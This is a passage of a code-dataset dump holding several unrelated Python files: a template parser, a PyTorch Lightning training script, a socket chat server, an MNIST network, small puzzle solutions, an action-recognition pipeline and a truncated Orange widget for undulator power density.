self._SkipSpace()\r\n if self._Match(\"not \"):\r\n self._SkipSpace()\r\n if not self._Match(TKN_NAME):\r\n self._RestorePos()\r\n return None\r\n name = self.last_match\r\n condition += \"not \"\r\n elif self._Match(TKN_NAME):\r\n name = self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if name in KEYWORDS:\r\n self._RestorePos()\r\n return None\r\n condition += name\r\n conditional_vars.add(name)\r\n self._SkipSpace()\r\n if self._Match(TKN_RELOP):\r\n condition += self.last_match\r\n self._SkipSpace()\r\n if self._Match(TKN_NAME) and self.last_match not in KEYWORDS:\r\n name = self.last_match\r\n conditional_vars.add(name)\r\n condition += name\r\n elif self._Match(TKN_STRING) or self._Match(TKN_NUMBER):\r\n condition += self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if not self._Match(\")\"):\r\n self._RestorePos()\r\n return None\r\n TrueTemplate = self._Compile(nested=True)\r\n if TrueTemplate is not None:\r\n self._KeepPos()\r\n FalseTemplate = self._Compile(nested=True)\r\n else:\r\n self._RestorePos()\r\n return None\r\n for conditional_var in conditional_vars:\r\n self.vars.add(conditional_var)\r\n if FalseTemplate is None:\r\n return (condition, TrueTemplate, ())\r\n else:\r\n return (condition, TrueTemplate, FalseTemplate)\r\n \r\n def _GetRelationalOperator(self):\r\n if self._Match(\"<>\"):\r\n return \"!=\"\r\n for op in (\"<=\", \"<\", \">=\", \">\", \"==\", \"!=\"):\r\n if self._Match(op):\r\n return op\r\n return None\r\n \r\n def _GetString(self):\r\n self._SavePos()\r\n if not self._Match('\"'):\r\n self._RestorePos()\r\n return None\r\n parsedString = ['u\"']\r\n while self.look is not None:\r\n if self._Match(\"\\\\\"):\r\n parsedString.append(r\"\\\\\")\r\n elif self._Match('\"\"'):\r\n parsedString.append(r'\\\"')\r\n elif self._Match('\"'):\r\n parsedString.append('\"')\r\n self._KeepPos()\r\n return u\"\".join(parsedString)\r\n else:\r\n parsedString.append(self.look)\r\n self._Next()\r\n self._RestorePos()\r\n return None\r\n \r\n def _GetNumber(self):\r\n self._SavePos()\r\n parsedNumber = []\r\n if self._Match(\"-\"):\r\n parsedNumber.append(\"-\")\r\n elif self._Match(\"+\"):\r\n pass\r\n if self.look not in string.digits:\r\n self._RestorePos()\r\n return None\r\n if self._Match('0'):\r\n while self._Match('0'):\r\n pass\r\n if self.look not in string.digits:\r\n parsedNumber.append('0')\r\n while self.look in string.digits:\r\n parsedNumber.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n self._SavePos()\r\n if self._Match(\".\"):\r\n if self.look not in string.digits:\r\n self._RestorePos()\r\n return u\"\".join(parsedNumber)\r\n parsedNumber.append(\".\")\r\n while self.look in string.digits:\r\n parsedNumber.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n return u\"\".join(parsedNumber)\r\n \r\n def _GetName(self):\r\n self._SavePos()\r\n if self.look not in ID_FIRST:\r\n self._RestorePos()\r\n return None\r\n name = [self.look]\r\n self._Next()\r\n while self.look in ID_REST:\r\n name.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n return u\"\".join(name)\r\n \r\n def _SkipSpace(self):\r\n if self._Match(\" \"):\r\n while self.look == \" \":\r\n self._Next()\r\n return True\r\n else:\r\n return False\r\n \r\n def Substitute(self, mapping, sub_template=None):\r\n data = None\r\n if sub_template is None:\r\n sub_template = self.template\r\n data = {}\r\n for var in self.vars:\r\n if var in mapping:\r\n data[var] = mapping[var]\r\n elif var == \"nl\":\r\n data['nl'] = u\"\\r\\n\"\r\n 
else:\r\n data[var] = u\"\"\r\n else:\r\n data = mapping\r\n strings = []\r\n for i in sub_template:\r\n if isinstance(i, basestring):\r\n strings.append(i.format(**data))\r\n elif eval(i[0], data):\r\n strings.append(self.Substitute(data, i[1]))\r\n else:\r\n strings.append(self.Substitute(data, i[2]))\r\n return u\"\".join(strings)\r\n","sub_path":"src/conditional_template.py","file_name":"conditional_template.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"616949313","text":"import os\nimport json\nimport torch\nimport pytorch_lightning as pl\n\nfrom datetime import datetime\nfrom argparse import ArgumentParser\n\nfrom hip import Transform, TileDataModule, TileModel\n\nMODEL_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"models\")\n\n\ndef tile_train():\n\n # ------------\n # args\n # ------------\n\n parser = ArgumentParser()\n parser.add_argument(\"--cfg\", type=str, default=None)\n parser.add_argument(\"--name\", type=str, default=None)\n parser.add_argument(\"--seed\", type=int, default=1234)\n parser.add_argument(\"--logdir\", type=str, default=\"logs\")\n parser.add_argument(\"--cluster\", action=\"store_true\")\n parser.add_argument(\"--modeldir\", type=str, default=MODEL_DIR)\n parser = pl.Trainer.add_argparse_args(parser)\n parser = TileModel.add_args(parser)\n parser = TileDataModule.add_args(parser)\n hp = parser.parse_args()\n d = vars(hp)\n\n if hp.cfg is not None:\n with open(hp.cfg) as stream:\n d.update(json.load(stream))\n\n ### If you want to save your cfg ###\n # with open(\"my_cfg.json\", 'w') as stream:\n # out = {k: v for k, v in d.items() if not callable(v)}\n # json.dump(out, stream, sort_keys=True, indent=2)\n # print('INFO: CFG WAS SAVED!')\n # return\n\n hp.name = hp.name or os.path.basename(hp.cfg).split(\".\")[0]\n hp.gpus = str(hp.gpus)\n pl.seed_everything(hp.seed)\n\n if hp.cluster:\n hp.root = os.environ[\"DATASET_LOCATION\"]\n hp.logdir = os.environ[\"EXPERIMENT_LOCATION\"]\n hp.progress_bar_refresh_rate = 1000\n hp.gpus = 1\n\n # ------------\n # model\n # ------------\n\n model = TileModel(\n num_classes=hp.num_classes,\n # Optimizer\n lr=hp.lr,\n ls=hp.ls,\n wd=hp.wd,\n threshold=hp.threshold,\n optimizer=hp.optimizer,\n schedule=hp.schedule,\n schedule_step=hp.schedule_step,\n logging_step=hp.logging_step,\n num_warmup_steps=hp.num_warmup_steps,\n # Backbone\n backbone=hp.backbone,\n pretrained=hp.pretrained,\n freeze=hp.freeze,\n unfreeze_blocks=hp.unfreeze_blocks,\n unfreeze_batchnorm=hp.unfreeze_batchnorm,\n dropout=hp.dropout,\n # Pooling\n mil_topk=hp.mil_topk,\n model_dir=hp.modeldir,\n )\n\n # ------------\n # transforms\n # ------------\n\n train_tfms = Transform(model.normalize, model.resize, hp.train_tfms)\n test_tfms = Transform(model.normalize, model.resize, hp.test_tfms)\n model.train_tfms = train_tfms.on_gpu\n model.test_tfms = test_tfms.on_gpu\n\n # ------------\n # data\n # ------------\n\n dm = TileDataModule(\n root=hp.root,\n batch_size=hp.batch_size,\n num_workers=hp.num_workers,\n train_pkl=hp.train_pkl,\n valid_pkl=hp.valid_pkl,\n test_pkl=None,\n train_tfms=train_tfms.on_cpu,\n test_tfms=test_tfms.on_cpu,\n id_column=hp.id_column,\n label_column=hp.label_column,\n tile_column=hp.tile_column,\n split_by=hp.split_by,\n valid_perc=hp.valid_perc,\n distributed=\"ddp\" in (hp.accelerator or \"\"),\n )\n dm.setup(\"fit\")\n\n # ------------\n # training\n # ------------\n\n now = 
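A usage illustration of the template grammar the parser above accepts (`$var`/`${var}` substitution and `$if(cond){then}{else}`). Python 2 only, since the class relies on `basestring`/`xrange`; the expected output is my reading of the code, not a tested result:

```python
# Assumes ConditionalTemplate is importable from this module (Python 2).
tmpl = ConditionalTemplate(u"Hello $name, $if(age >= 18){adult}{minor}")
print(tmpl.Substitute({u"name": u"Ada", u"age": 36}))  # Hello Ada, adult
```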
datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n log_path = os.path.join(hp.logdir, hp.name)\n ckpt_dir = os.path.join(log_path, \"ckpts\")\n ckpt_file = f\"{now}-{hp.backbone}\"\n ckpt_file += \"-{step:05d}-{valid_auroc:.2f}\"\n ckpt_file += \"-{valid_loss_epoch_tile:.2f}-{valid_loss_epoch_slide:.2f}\"\n\n lr_monitor = pl.callbacks.lr_monitor.LearningRateMonitor()\n logger = pl.loggers.TensorBoardLogger(log_path, name=None)\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor=\"valid_loss_epoch_slide\",\n dirpath=ckpt_dir,\n filename=ckpt_file,\n save_top_k=1,\n mode=\"min\",\n )\n print(\"\\nDeterminsitic:\", hp.deterministic, \"\\n\")\n trainer = pl.Trainer.from_argparse_args(\n hp,\n logger=logger,\n callbacks=[checkpoint_callback, lr_monitor],\n resume_from_checkpoint=hp.resume_from_checkpoint,\n )\n\n trainer.fit(model, datamodule=dm)\n\n # ------------\n # testing\n # ------------\n\n pass\n\n\nif __name__ == \"__main__\":\n tile_train()\n","sub_path":"code/scripts/tile_train.py","file_name":"tile_train.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"461002089","text":"#coding:utf-8\nfrom __future__ import print_function\nimport socketserver\nfrom threading import Thread\nimport time\n\n\ndef LogPrint(address, data, is_send=0):\n if(is_send == 0):\n print(\"\\rfrom \" + address + \" message : \" + str(data))\n print(\"\\rsend message \" + address + \" : \", end=\"\")\n else:\n print(\"\\rsend message \" + address + \" : \", end=\"\")\n\ndef ListenMessage(conn, td):\n while True:\n time.sleep(1)\n data = conn.recv(1024)\n data = str(data).replace('\\n', '')\n if data != '':\n LogPrint(str(td.client_address[0]), str(data))\n\ndef SendMessage(conn, td):\n while True:\n time.sleep(1)\n message = raw_input()\n if message != '':\n conn.sendall(message + '\\n')\n LogPrint(str(td.client_address[0]), str(message), 1)\n\ndef Console(conn, self, todo):\n if todo == 'listen':\n ListenMessage(conn, self)\n else:\n if todo == 'send':\n SendMessage(conn, self)\n\n\nclass MyServer(socketserver.BaseRequestHandler):\n def handle(self):\n conn = self.request\n conn.sendall('hello,start talking \\n')\n threads = []\n threads.append(Thread(target=Console, args=(conn, self, 'listen')))\n threads.append(Thread(target=Console, args=(conn, self, 'send')))\n for i in range(len(threads)):\n threads[i].start()\n for i in range(len(threads)):\n threads[i].join()\n\n\n\nif __name__ == '__main__':\n print(\"starting socket server......\")\n server = socketserver.ThreadingTCPServer(('0.0.0.0', 8888), MyServer)\n server.serve_forever()","sub_path":"Python Socket/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"576546567","text":"import random\nimport pickle\nimport gzip\nimport numpy as np\n\nclass neural_network():\n\tdef __init__(self, sizes, data_path, epochs, mini_batch_size, learning_rate):\n\t\tself.sizes = sizes\n\t\tself.num_layers = len(sizes)\n\t\tself.weights = [np.random.randn(x, y) for x, y in zip(sizes[1:], sizes[:-1])]\n\t\tself.biases = [np.random.randn(x, 1) for x in sizes[1:]]\n\n\t\tself.data_path = data_path\n\t\tself.epochs = epochs\n\t\tself.mini_batch_size = mini_batch_size\n\t\tself.learning_rate = learning_rate\n\n\t\tself.test_data_size = 0\n\t\tself.training_data_size = 0\n\n\t# all the math functions\n\tdef sigmoid(self, x):\n\t\treturn 1.0 / (1.0 
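Server.py above mixes Python 2 and 3 idioms: `raw_input` and str-typed `sendall`/`recv` handling break under the Python 3 `socketserver` it imports. A Python 3-safe sketch of the send/receive pieces (names kept close to the original, threading omitted for brevity):

```python
import socketserver

class MyServer(socketserver.BaseRequestHandler):
    def handle(self):
        conn = self.request
        conn.sendall(b'hello,start talking \n')    # sockets carry bytes, not str
        data = conn.recv(1024).decode('utf-8')     # decode before string operations
        message = input()                          # raw_input is Python 2 only
        conn.sendall((message + '\n').encode('utf-8'))
```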
+ np.exp(-x))\n\n\tdef sigmoid_derivative(self, x):\n\t\treturn self.sigmoid(x) * (1-self.sigmoid(x))\n\n\tdef vectorize_result(self, x):\n\t\ta = np.zeros((self.sizes[-1], 1))\n\t\ta[x] = 1.0\n\t\treturn a\n\n\tdef cost_derivative_a(self, activation, result):\n\t\t# cost function here is quadratic c = 1/2 * sum(yj - aj)^2\n\t\t# the derivative of it is simply: a_vector - y_vector (the result vector)\n\t\treturn (activation - result)\n\n\t# loading data\n\tdef load_data(self):\n\t\tf = gzip.open(self.data_path, 'rb')\n\t\ttr_d, va_d, te_d = pickle.load(f, encoding='latin1')\n\t\tf.close()\n\n\t\ttraining_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in tr_d[0]]\n\t\ttraining_results = [self.vectorize_result(y) for y in tr_d[1]]\n\t\tvalidation_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in va_d[0]]\n\t\ttest_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in te_d[0]]\n\n\t\ttraining_data = list(zip(training_inputs, training_results))\n\t\ttest_data = list(zip(test_inputs, te_d[1]))\n\n\t\tself.training_data_size = len(training_data)\n\t\tself.test_data_size = len(test_data)\n\n\t\treturn training_data, test_data\n\n\tdef SGD(self):\n\t\ttraining_data, test_data = self.load_data();\n\t\tfor i in range(self.epochs):\n\t\t\tnp.random.shuffle(training_data)\n\t\t\tnp.random.shuffle(test_data)\n\t\t\tmini_batches = self.make_mini_batches(training_data)\n\t\t\t\n\t\t\tfor mini_batch in mini_batches:\n\t\t\t\tdCdb = [np.zeros(b.shape) for b in self.biases]\n\t\t\t\tdCdw = [np.zeros(w.shape) for w in self.weights]\n\t\t\t\tfor activation, result in mini_batch:\t# go through each sample\n\t\t\t\t\tdelta_dCdb, delta_dCdw = self.propagate(activation, result)\n\t\t\t\t\tdCdb = [a+b for a, b in zip(dCdb, delta_dCdb)]\n\t\t\t\t\tdCdw = [a+b for a, b in zip(dCdw, delta_dCdw)]\n\t\t\t\tself.weights = [w-(self.learning_rate/len(mini_batch))*dw for w, dw in zip(self.weights, dCdw)]\n\t\t\t\tself.biases = [b-(self.learning_rate/len(mini_batch))*db for b, db in zip(self.biases, dCdb)]\n\t\t\tcorrect = self.test(test_data)\n\t\t\t# print(correct)\n\t\t\tprint(\"Epoch %d: %d/%d, %4.2f%% accuracy\"% (i+1, correct, self.test_data_size, correct/self.test_data_size*100))\n\t\tprint(\"Complete.\")\n\n\tdef make_mini_batches(self, training_data):\n\t\tmini_batches = [training_data[x : x+self.mini_batch_size] \\\n\t\t\t\t\t\tfor x in range(0, self.training_data_size, self.mini_batch_size)]\n\t\treturn mini_batches\n\n\tdef propagate(self, activation, result):\n\t\ta = activation\n\t\ta_vector = []\n\t\ta_vector.append(a)\t# first, append inputs\n\t\tz_vector = []\n\t\tdCdb = [np.zeros(b.shape) for b in self.biases]\n\t\tdCdw = [np.zeros(w.shape) for w in self.weights]\n\n\t\t# feedforward\n\t\tfor w,b in zip(self.weights, self.biases):\n\t\t\tz = np.dot(w, a) + b\n\t\t\ta = self.sigmoid(z)\n\t\t\tz_vector.append(z)\n\t\t\ta_vector.append(a)\n\n\t\t# output layer error\n\t\terror_L = self.cost_derivative_a(a_vector[-1], result) * self.sigmoid_derivative(z_vector[-1])\n\t\terror = error_L\n\t\t# output layer derivatives calculation\n\t\tdCdb[-1] = error_L\n\t\tdCdw[-1] = np.dot(error_L, a_vector[-2].transpose())\n\n\t\t# error back-propagate\n\t\tfor l in range(self.num_layers-2, 0, -1):\t# l = 1\n\t\t\terror = np.dot(self.weights[l].transpose(), error) * self.sigmoid_derivative(z_vector[l-1])\n\t\t\tdCdb[l-1] = error\n\t\t\tdCdw[l-1] = np.dot(error, a_vector[l-1].transpose())\n\t\treturn dCdb, dCdw\n\n\tdef test(self, test_data):\n\t\tcorrect = 0\n\t\tfor test_inputs, test_results in test_data:\t\t# load 
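A quick numerical check that `sigmoid_derivative` above matches a finite difference (standalone, mirroring the methods as plain functions):

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def sigmoid_derivative(x):
    return sigmoid(x) * (1 - sigmoid(x))

# Central difference approximation of d(sigmoid)/dx at x = 0.5.
x, eps = 0.5, 1e-6
numeric = (sigmoid(x + eps) - sigmoid(x - eps)) / (2 * eps)
print(abs(numeric - sigmoid_derivative(x)) < 1e-9)  # True
```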
test data\n\t\t\ta = test_inputs\n\t\t\tfor w,b in zip(self.weights, self.biases):\n\t\t\t\ta = self.sigmoid(np.dot(w, a)+b)\n\t\t\tif np.argmax(a) == test_results:\n\t\t\t\tcorrect += 1\n\t\treturn correct\n\n\nnet = neural_network([784, 30, 10], 'mnist.pkl.gz', 5, 10, 3.0)\nnet.SGD()\n","sub_path":"deep_learning/minist_first _lesson/Neural Network 2 Object.py","file_name":"Neural Network 2 Object.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"84645476","text":"import pathlib\nimport math\n\n\ndef get_lcm(n1, n2):\n    gcd = math.gcd(n1, n2)\n    return (n1 * n2) / gcd\n\n\nfile_name = \"13.txt\"\ncurrent_dir = pathlib.Path(__file__).parent.absolute()\nfile_path = pathlib.Path(current_dir / \"data\" / file_name)\n\nwith open(file_path, \"r\") as file:\n    buses = [direction.strip() for direction in file.readlines()]\n\nbus_time_list = [int(bus) if bus != \"x\" else 0 for bus in buses[1].split(\",\")]\nincrement = bus_time_list[0]\nstart_time = increment\n\nsolved = False\nsfi = 1\n\nwhile not solved:\n    this_run_ok = True\n    if bus_time_list[sfi] != 0:\n        current_value = start_time + sfi\n        if current_value / bus_time_list[sfi] == current_value // bus_time_list[sfi]:\n            print(f\"Solved for {sfi}: start_time :{start_time}\")\n            increment = int(get_lcm(bus_time_list[sfi], increment))\n            sfi += 1\n            if sfi >= len(bus_time_list):\n                solved = True\n            try:\n                while bus_time_list[sfi] == 0:\n                    sfi += 1\n            except IndexError:\n                solved = True\n\n    else:\n        while bus_time_list[sfi] == 0:\n            sfi += 1\n\n    start_time += increment\n","sub_path":"13_2.py","file_name":"13_2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"36876899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/4 10:02\n# @Author : FebSun\n# @FileName: climbing_stairs.py\n# @Software: PyCharm\n\n# Problem:\n# You are climbing a staircase that takes n steps to reach the top. Each time you can climb 1 or 2 steps. How many distinct ways can you climb to the top?\n# Idea:\n# Suppose there are 20 steps and Zhang San is now standing on step 20. How did his last move get him there?\n# He had two choices:\n# 1. From step 19, take one step to reach step 20\n# 2. From step 18, take two steps to reach step 20\n# That is, stair(20) = stair(19) + stair(18)\n\n\ndef climbing_stairs(n):\n    stairs = 0\n    if n == 1:\n        stairs = 1\n    elif n == 2:\n        stairs = 2\n    else:\n        stairs = climbing_stairs(n - 1) + climbing_stairs(n - 2)\n    return stairs\n\n\nif __name__ == \"__main__\":\n    print(climbing_stairs(10))\n","sub_path":"recursive_algorithm/climbing_stairs.py","file_name":"climbing_stairs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"596729219","text":"\"\"\"\nTHIS CODE IMPLEMENTS THE BAG OF FEATURES APPROACH WITH VARIOUS WAYS FOR SPATIAL BINNING, ENCODING, POOLING\n\n\"\"\"\n\n__author__ = 'eweiwi'\nimport sys\nsys.path.append('/home/eweiwi/phd_work/toy_experiments/')\n\nfrom MyCode.utils.BofExtractor import BagOfFeatureExtractor\nimport numpy as np\nimport logging\n\nfrom MyCode.Classifier.svm_model_selection import svm_model_report,custom_svm_kernel\n#from MyCode.Classifier.KISSME import *\nimport ast\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\nlog = logging.getLogger(__name__)\n\ndef plot_acc (C_s,scores,scores_std):\n    import pylab as pl\n    pl.figure(1, figsize=(2.5, 2))\n    pl.clf()\n    pl.axes([.1, .25, .8, .7])\n    pl.semilogx(C_s, scores)\n    pl.semilogx(C_s, np.array(scores) + np.array(scores_std), 'b--')\n    pl.semilogx(C_s, np.array(scores) - np.array(scores_std), 'b--')\n    
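`climbing_stairs` above recomputes subproblems and is exponential in n; a memoized variant in the same style:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def climbing_stairs_fast(n):
    # Same recurrence, but each subproblem is computed once.
    if n <= 2:
        return n
    return climbing_stairs_fast(n - 1) + climbing_stairs_fast(n - 2)

print(climbing_stairs_fast(10))  # 89, same as climbing_stairs(10)
```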
pl.yticks(())\n pl.ylabel('CV score')\n pl.xlabel('Parameter C')\n pl.ylim(0, 1.1)\n #pl.axhline(np.max(scores), linestyle='--', color='.5')\n pl.text(C_s[np.argmax(scores)], .9 * np.max(scores), '%.3f' % np.max(scores),\n verticalalignment='top', horizontalalignment='center',)\n pl.show()\n\ndef spm_classify(tr_data,tr_labels,tst_data,tst_labels,param):\n output_file = 'output_intersection_kernel.txt'\n \n #------------------------------SVM with custom kernel\n custom_svm_kernel(tr_data,tr_labels,tst_data,tst_labels,output_file,param)\n #------------------------------------------------------\n \n #------------------------------SVM with linear or rbf kernel\n svm_model_report(tr_data,tr_labels,tst_data,tst_labels,output_file,param)\n #------------------------------------------------------\n \n #------------------------------KISS ME TEST WITH BOF\n #Kissme_metric(tr_data,tr_labels,tst_data,tst_labels)\n #------------------------------------------------------\n \ndef main(output_file=None,**param):\n \n default_param = {'num_words' :512,\n 'sampling' : 'UNIFORM',\n 'im_size' : None,\n 'pSize' : (24,24),\n 'spacing' : 8,\n 'use_existing_split' : True ,\n 'use_existing_descriptors' : True,\n 'extention' : 'jpg',\n 'cont':'images',\n 'split_ratio' :[0.8,0.2],\n 'encode' : 'LLC',\n 'pool' : 'max', \n 'sp_pyramid':2,\n 'data_structure' : 'dataframe',\n 'feature_type':'hog' ,\n 'cluster_pak':'scipy',\n 'train_test_store_path' : 'train_test_spm.h5',\n 'descriptors_store_path' : 'descriptors_store_spm.h5',\n 'work_path' : '/home/eweiwi/phd_work/toy_experiments/',\n 'raw_data_path' : '/home/eweiwi/phd_work/toy_experiments/datasets/willowactions/',\n 'whiten' : False ,\n 'tfidf' : False,\n 'tr_path':'/home/eweiwi/phd_work/datasets/Action_in_still_images/willowactions/train',\n 'tst_path':'/home/eweiwi/phd_work/datasets/Action_in_still_images/willowactions/test',\n 'use_benchmark_split':True,\n 'max_size':300,\n 'num_of_topics':16}\n if param != {}:\n default_param = param\n action_spm =BagOfFeatureExtractor(**default_param)\n\t\n if action_spm.im_size is not None:\n action_spm.Transform_spatial_pyramid()\n\t\t\n action_spm.Fit_train_test()\n\n #import ipdb; ipdb.set_trace()\n #action_spm.Transform_train_test_data()\n action_spm.Transform_train_data()\n action_spm.Transform_train_patch_features()\n \n action_spm.Transform_train_visual_words()\n action_spm.Transform_document_term(to_transform='train')\n \n #For test samples, transform one by one for memory issues\n tst_data = None\n for tst_im_pth in action_spm.test_structure.Path:\n action_spm.Transform_test_data([tst_im_pth])\n action_spm.Transform_test_patch_features()\n action_spm.Transform_test_visual_words()\n action_spm.Transform_document_term(to_transform='test')\n tst_data = action_spm.test_doc_term if tst_data is None else np.r_[tst_data,action_spm.test_doc_term]\n\t\t\t\t\n \n \n \n \n \n \n \n tr_data = action_spm.doc_term\n #import ipdb; ipdb.set_trace()\n tr_labels = action_spm.train_structure.Action.values\n tst_labels = action_spm.test_structure.Action.values\n \n del action_spm\n import gc\n gc.collect()\n \n #To classify with spm classifier uncomment this line, notice that you should set random_pooling to false\n spm_classify(tr_data,tr_labels,tst_data,tst_labels,default_param)\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n #param_file = 'param_file_willow.txt'\n param_file = None\n output_file = 'output_cluster_change.txt'\n #load parameters file\n if param_file is not None:\n f = open(param_file,'r')\n param_line = 'start'\n #loop 
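The `'pool': 'max'` option in the parameter dictionary above reduces per-patch encodings to one image-level vector. A toy numpy sketch of max vs. sum pooling over LLC-style codes (the 4x5 code matrix is invented for illustration):

```python
import numpy as np

codes = np.random.rand(4, 5)     # 4 patches, 5 visual words
max_pooled = codes.max(axis=0)   # 'max' pooling: strongest response per word
sum_pooled = codes.sum(axis=0)   # 'sum' pooling: histogram-like accumulation
print(max_pooled.shape, sum_pooled.shape)  # (5,) (5,)
```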
over each parameter\n while param_file.strip() != '':\n #pass the paramter to the main\n param_line = f.readline()\n param = ast.literal_eval(param_line)\n main (output_file,**param)\n else:\n main ()\n\n","sub_path":"MyCode/tests/ActionsSpm.py","file_name":"ActionsSpm.py","file_ext":"py","file_size_in_byte":5882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455142171","text":"import sys\nfrom PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy\nfrom Orange.widgets import widget, gui\nfrom Orange.widgets.settings import Setting\nfrom Orange.data import Table, Domain, ContinuousVariable\nimport numpy as np\n\ntry:\n from orangecontrib.xoppy.util.xoppy_calc import xoppy_doc\nexcept ImportError:\n print(\"Error importing: xoppy_doc\")\n raise\n\ntry:\n from orangecontrib.xoppy.util.xoppy_calc import xoppy_calc_undulator_power_density\nexcept ImportError:\n print(\"compute pressed.\")\n print(\"Error importing: xoppy_calc_undulator_power_density\")\n raise\n\nclass OWundulator_power_density(widget.OWWidget):\n name = \"undulator_power_density\"\n id = \"orange.widgets.dataundulator_power_density\"\n description = \"xoppy application to compute...\"\n icon = \"icons/xoppy_undulator_power_density.png\"\n author = \"create_widget.py\"\n maintainer_email = \"srio@esrf.eu\"\n priority = 10\n category = \"\"\n keywords = [\"xoppy\", \"undulator_power_density\"]\n outputs = [#{\"name\": \"xoppy_data\",\n # \"type\": np.ndarray,\n # \"doc\": \"\"},\n {\"name\": \"xoppy_table\",\n \"type\": Table,\n \"doc\": \"\"},\n {\"name\": \"xoppy_specfile\",\n \"type\": str,\n \"doc\": \"\"}]\n\n #inputs = [{\"name\": \"Name\",\n # \"type\": type,\n # \"handler\": None,\n # \"doc\": \"\"}]\n\n want_main_area = False\n\n ELECTRONENERGY = Setting(6.04)\n ELECTRONENERGYSPREAD = Setting(0.001)\n ELECTRONCURRENT = Setting(0.2)\n ELECTRONBEAMSIZEH = Setting(0.000395)\n ELECTRONBEAMSIZEV = Setting(9.9e-06)\n ELECTRONBEAMDIVERGENCEH = Setting(1.05e-05)\n ELECTRONBEAMDIVERGENCEV = Setting(3.9e-06)\n PERIODID = Setting(0.018)\n NPERIODS = Setting(222)\n KV = Setting(1.68)\n DISTANCE = Setting(30.0)\n GAPH = Setting(0.003)\n GAPV = Setting(0.003)\n HSLITPOINTS = Setting(41)\n VSLITPOINTS = Setting(41)\n METHOD = Setting(0)\n\n\n def __init__(self):\n super().__init__()\n\n box0 = gui.widgetBox(self.controlArea, \" \",orientation=\"horizontal\") \n #widget buttons: compute, set defaults, help\n gui.button(box0, self, \"Compute\", callback=self.compute)\n gui.button(box0, self, \"Defaults\", callback=self.defaults)\n gui.button(box0, self, \"Help\", callback=self.help1)\n self.process_showers()\n box = gui.widgetBox(self.controlArea, \" \",orientation=\"vertical\") \n \n \n idx = -1 \n \n #widget index 0 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONENERGY\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 1 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONENERGYSPREAD\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 2 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONCURRENT\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget 
index 3 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMSIZEH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 4 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMSIZEV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 5 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMDIVERGENCEH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 6 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMDIVERGENCEV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 7 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"PERIODID\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 8 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"NPERIODS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 9 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"KV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 10 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, 